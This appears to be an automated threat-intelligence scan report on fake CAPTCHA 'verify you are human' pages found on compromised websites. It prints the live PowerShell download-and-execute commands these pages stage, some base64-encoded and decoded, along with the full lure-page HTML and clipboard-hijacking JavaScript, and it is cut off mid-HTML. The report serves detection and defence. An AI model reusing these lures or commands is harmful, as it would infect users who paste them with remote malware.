ClickGrab Report: 2025-04-24
Report Summary
Sites Scanned: 31
Attacks Detected: 138
New Attack Patterns: 0
Affected Sites
Site Domain | Attack Type | Detected Patterns | First Seen |
---|---|---|---|
riverview-pools.com | PowerShell Execution | 5 | 2025-04-24 |
blessdayservices.org | PowerShell Execution | 5 | 2025-04-24 |
jessespridecharters.com | PowerShell Execution | 5 | 2025-04-24 |
mail.lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-24 |
mail.finocci.com | PowerShell Execution | 1 | 2025-04-24 |
cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-24 |
admin.gestroom.it | PowerShell Execution | 1 | 2025-04-24 |
test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-24 |
first-security-verden.de | PowerShell Execution | 5 | 2025-04-24 |
lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-24 |
www.first-security-verden.de | PowerShell Execution | 5 | 2025-04-24 |
www.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-24 |
finocci.com | PowerShell Execution | 1 | 2025-04-24 |
www.finocci.com | PowerShell Execution | 1 | 2025-04-24 |
www.website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-24 |
www.lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
www.bratusferramentas.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
ningbocrm.jintsume.net | PowerShell Execution | 8 | 2025-04-24 |
horno-rafelet.es | PowerShell Execution | 3 | 2025-04-24 |
bmdcompany.com | PowerShell Execution | 1 | 2025-04-24 |
www.zamilgroups.com | PowerShell Execution | 1 | 2025-04-24 |
lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
laborpartyjo.com | PowerShell Execution | 3 | 2025-04-24 |
www.thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
www.test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-24 |
mail.cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-24 |
my.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
82.146.62.232 | PowerShell Execution | 3 | 2025-04-24 |
101.32.40.22 | PowerShell Execution | 4 | 2025-04-24 |
staplebrokenmetaliyro.blogspot.com | PowerShell Execution | 46 | 2025-04-24 |
Detailed URL Analysis
https://riverview-pools.com/verify/index.html
Total findings: 5
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
powershell " + htaPath; iex (irm 'https://aatox.com/verify/45.ps1')
JSON Technical Data
https://blessdayservices.org/up/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\""; powershell " + htaPath;
JSON Technical Data
https://jessespridecharters.com/v/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
powershell " + htaPath;
JSON Technical Data
https://mail.lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
https://mail.finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://mail.finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
Type | Value |
---|---|
URL | https://browser.certif-update.website/ |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://cambodiatouristservice.com/", "URLs": [ "https://browser.certif-update.website/", "https://browser.certif-update.website/" ], "HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>", "ThreatLevel": "None" }
https://admin.gestroom.it/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://admin.gestroom.it/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"
JSON Technical Data
{ "URL": "https://test.peperoncinochepassione.it/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=", "Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r", "ClipboardCommands": "PowErsHeLL -W hiddEn ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
{ "URL": "https://first-security-verden.de/", "URLs": [ "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/logo.svg", "https://www.webgo.de/assets/images/misc/construction.png", "https://www.webgo.de/webhosting/" ], "HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n 
top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n", "ThreatLevel": "None" }
https://lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://lucprofessional.com.br/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
